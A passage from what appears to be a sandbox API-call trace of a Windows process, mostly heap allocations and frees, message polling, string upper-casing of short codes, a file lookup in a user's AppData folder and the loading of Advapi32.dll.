Size=0x20) returned 0x2a77aa8 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0149.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0149.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.159] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NERYDfycG70.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290572c0, ftCreationTime.dwHighDateTime=0x1d5c9ee, ftLastAccessTime.dwLowDateTime=0x36ad780, ftLastAccessTime.dwHighDateTime=0x1d5d36c, ftLastWriteTime.dwLowDateTime=0x36ad780, ftLastWriteTime.dwHighDateTime=0x1d5d36c, nFileSizeHigh=0x0, nFileSizeLow=0x44c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NERYDfycG70.mp3", cAlternateFileName="NERYDF~1.MP3")) returned 0x9e1bb8 [0149.159] FindClose (in: hFindFile=0x9e1bb8 | out: hFindFile=0x9e1bb8) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0149.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.163] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.163] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0d8 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.163] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.163] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0149.163] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0149.163] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.164] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa138 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.164] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.164] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0149.164] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0149.164] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0149.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.165] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.165] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.166] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.166] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.166] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.166] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.166] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.167] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0149.167] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.167] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.167] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.167] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: 